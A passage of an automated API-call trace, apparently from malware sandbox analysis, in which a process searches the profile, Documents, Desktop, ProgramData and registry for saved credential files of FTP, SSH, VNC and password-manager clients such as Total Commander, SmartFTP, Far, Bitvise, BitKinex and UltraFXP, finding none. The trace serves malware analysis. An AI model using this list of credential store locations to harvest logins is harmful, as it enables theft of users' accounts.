(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.136] GetProcessHeap () returned 0x620000 [0064.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.136] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.137] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Windows") returned 0x0 [0064.137] GetProcessHeap () returned 0x620000 [0064.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b6b0 [0064.138] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.139] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0064.139] GetProcessHeap () returned 0x620000 [0064.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x636d30 [0064.139] GetProcessHeap () returned 0x620000 [0064.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.140] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0064.140] GetProcessHeap () returned 0x620000 [0064.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636d30 | out: hHeap=0x620000) returned 1 [0064.141] GetProcessHeap () returned 0x620000 [0064.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.141] GetProcessHeap () returned 0x620000 [0064.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b6b0 [0064.142] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.142] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0064.142] GetProcessHeap () returned 0x620000 [0064.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x66) returned 0x638b60 [0064.142] GetProcessHeap () returned 0x620000 [0064.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.144] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0064.144] GetProcessHeap () returned 0x620000 [0064.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.144] GetProcessHeap () returned 0x620000 [0064.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.145] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.146] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0064.146] GetProcessHeap () returned 0x620000 [0064.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5c) returned 0x63b6b0 [0064.146] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.147] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0064.147] GetProcessHeap () returned 0x620000 [0064.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46) returned 0x63ae58 [0064.147] GetProcessHeap () returned 0x620000 [0064.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.148] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0064.149] GetProcessHeap () returned 0x620000 [0064.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ae58 | out: hHeap=0x620000) returned 1 [0064.149] GetProcessHeap () returned 0x620000 [0064.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.149] GetProcessHeap () returned 0x620000 [0064.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63b6b0 [0064.150] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.151] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0064.151] GetProcessHeap () returned 0x620000 [0064.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x637220 [0064.151] GetProcessHeap () returned 0x620000 [0064.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.152] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0064.152] GetProcessHeap () returned 0x620000 [0064.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637220 | out: hHeap=0x620000) returned 1 [0064.161] GetProcessHeap () returned 0x620000 [0064.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0064.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.162] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104) returned 0x2 [0064.162] GetProcessHeap () returned 0x620000 [0064.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.163] GetProcessHeap () returned 0x620000 [0064.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.163] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.170] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0064.170] GetProcessHeap () returned 0x620000 [0064.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f56) returned 0x63b6b0 [0064.171] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.172] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\SmartFTP", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0064.172] GetProcessHeap () returned 0x620000 [0064.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0064.172] GetProcessHeap () returned 0x620000 [0064.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.174] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0064.174] GetProcessHeap () returned 0x620000 [0064.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.174] GetProcessHeap () returned 0x620000 [0064.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.175] GetProcessHeap () returned 0x620000 [0064.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0064.175] GetProcessHeap () returned 0x620000 [0064.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b680 [0064.175] GetProcessHeap () returned 0x620000 [0064.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0064.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.176] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x63b510 | out: phkResult=0x63b510*=0x0) returned 0x2 [0064.176] GetProcessHeap () returned 0x620000 [0064.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0064.176] GetProcessHeap () returned 0x620000 [0064.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4e0 [0064.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.178] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x63b4e0 | out: phkResult=0x63b4e0*=0x0) returned 0x2 [0064.178] GetProcessHeap () returned 0x620000 [0064.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e0 | out: hHeap=0x620000) returned 1 [0064.178] GetProcessHeap () returned 0x620000 [0064.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.178] GetProcessHeap () returned 0x620000 [0064.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b680 | out: hHeap=0x620000) returned 1 [0064.178] GetProcessHeap () returned 0x620000 [0064.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3fd4) returned 0x63b6b0 [0064.179] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.180] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0064.180] GetProcessHeap () returned 0x620000 [0064.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xde) returned 0x63a478 [0064.180] GetProcessHeap () returned 0x620000 [0064.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.181] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0064.181] GetProcessHeap () returned 0x620000 [0064.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.182] GetProcessHeap () returned 0x620000 [0064.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.182] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.183] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.189] Sleep (dwMilliseconds=0xa) [0064.204] GetProcessHeap () returned 0x620000 [0064.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.204] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.205] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0064.205] GetProcessHeap () returned 0x620000 [0064.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4e) returned 0x638b60 [0064.205] GetProcessHeap () returned 0x620000 [0064.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.206] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.tlp"), lpFindFileData=0x19f920 | out: lpFindFileData=0x19f920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x627960, nFileSizeHigh=0x6340e0, nFileSizeLow=0x634220, dwReserved0=0x0, dwReserved1=0x19f97c, cFileName="ը睹", cAlternateFileName="뒭蕬͈읩愛"ﮄ\x19䂑@")) returned 0xffffffff [0064.207] GetProcessHeap () returned 0x620000 [0064.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.207] GetProcessHeap () returned 0x620000 [0064.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.207] GetProcessHeap () returned 0x620000 [0064.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.208] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.209] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.210] Sleep (dwMilliseconds=0xa) [0064.288] GetProcessHeap () returned 0x620000 [0064.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.288] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.289] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0064.289] GetProcessHeap () returned 0x620000 [0064.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x638b60 [0064.289] GetProcessHeap () returned 0x620000 [0064.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.290] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.bscp"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x627960, nFileSizeHigh=0x6340e0, nFileSizeLow=0x6347c0, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը睹", cAlternateFileName="뒭蕬͈읩愣"ﭬ\x19䂑@")) returned 0xffffffff [0064.291] GetProcessHeap () returned 0x620000 [0064.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.291] GetProcessHeap () returned 0x620000 [0064.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.292] GetProcessHeap () returned 0x620000 [0064.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0064.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.293] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fb74*=0x104) returned 0x2 [0064.293] GetProcessHeap () returned 0x620000 [0064.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.293] GetProcessHeap () returned 0x620000 [0064.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.294] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.294] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.295] Sleep (dwMilliseconds=0xa) [0064.312] GetProcessHeap () returned 0x620000 [0064.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.312] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.313] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0064.313] GetProcessHeap () returned 0x620000 [0064.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4e) returned 0x638b60 [0064.313] GetProcessHeap () returned 0x620000 [0064.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.314] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.vnc"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x627960, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x6340e0, nFileSizeHigh=0x634898, nFileSizeLow=0x0, dwReserved0=0x19f96c, dwReserved1=0x77790568, cFileName="", cAlternateFileName="͈읩愫"")) returned 0xffffffff [0064.315] GetProcessHeap () returned 0x620000 [0064.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0064.315] GetProcessHeap () returned 0x620000 [0064.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.315] GetProcessHeap () returned 0x620000 [0064.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.316] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.317] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0064.319] Sleep (dwMilliseconds=0xa) [0064.381] GetProcessHeap () returned 0x620000 [0064.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.382] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.382] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0064.382] GetProcessHeap () returned 0x620000 [0064.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x63a6e0 [0064.383] GetProcessHeap () returned 0x620000 [0064.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.384] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.vnc"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x627960, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x6340e0, nFileSizeHigh=0x6342b0, nFileSizeLow=0x0, dwReserved0=0x19f954, dwReserved1=0x77790568, cFileName="", cAlternateFileName="螚䇆愳"")) returned 0xffffffff [0064.384] GetProcessHeap () returned 0x620000 [0064.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.385] GetProcessHeap () returned 0x620000 [0064.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.385] GetProcessHeap () returned 0x620000 [0064.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.386] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.386] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.386] GetProcessHeap () returned 0x620000 [0064.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f54) returned 0x63b6b0 [0064.387] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.388] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\mSecure", arglist=0x19fb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0064.388] GetProcessHeap () returned 0x620000 [0064.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x52) returned 0x63a6e0 [0064.388] GetProcessHeap () returned 0x620000 [0064.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.390] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0064.390] GetProcessHeap () returned 0x620000 [0064.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.390] GetProcessHeap () returned 0x620000 [0064.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.391] GetProcessHeap () returned 0x620000 [0064.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.391] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.392] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\ProgramData") returned 0x0 [0064.392] GetProcessHeap () returned 0x620000 [0064.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f58) returned 0x63b6b0 [0064.393] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.393] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Syncovery", arglist=0x19fb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0064.393] GetProcessHeap () returned 0x620000 [0064.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x34) returned 0x62d350 [0064.393] GetProcessHeap () returned 0x620000 [0064.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.395] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0064.395] GetProcessHeap () returned 0x620000 [0064.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.395] GetProcessHeap () returned 0x620000 [0064.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d350 | out: hHeap=0x620000) returned 1 [0064.396] GetProcessHeap () returned 0x620000 [0064.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.396] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.397] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0064.397] GetProcessHeap () returned 0x620000 [0064.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b6b0 [0064.397] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.398] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0064.398] GetProcessHeap () returned 0x620000 [0064.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63a6e0 [0064.398] GetProcessHeap () returned 0x620000 [0064.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.399] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0064.400] GetProcessHeap () returned 0x620000 [0064.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.400] GetProcessHeap () returned 0x620000 [0064.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.400] GetProcessHeap () returned 0x620000 [0064.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63b6b0 [0064.401] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.402] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0064.402] GetProcessHeap () returned 0x620000 [0064.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x6376a0 [0064.402] GetProcessHeap () returned 0x620000 [0064.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.404] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0064.404] GetProcessHeap () returned 0x620000 [0064.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6376a0 | out: hHeap=0x620000) returned 1 [0064.404] GetProcessHeap () returned 0x620000 [0064.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6a) returned 0x63b6b0 [0064.405] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.406] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0064.406] GetProcessHeap () returned 0x620000 [0064.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x74) returned 0x6373a0 [0064.406] GetProcessHeap () returned 0x620000 [0064.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.407] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0064.407] GetProcessHeap () returned 0x620000 [0064.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6373a0 | out: hHeap=0x620000) returned 1 [0064.407] GetProcessHeap () returned 0x620000 [0064.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f68) returned 0x63b6b0 [0064.408] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.409] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0064.409] GetProcessHeap () returned 0x620000 [0064.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x637ca0 [0064.409] GetProcessHeap () returned 0x620000 [0064.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 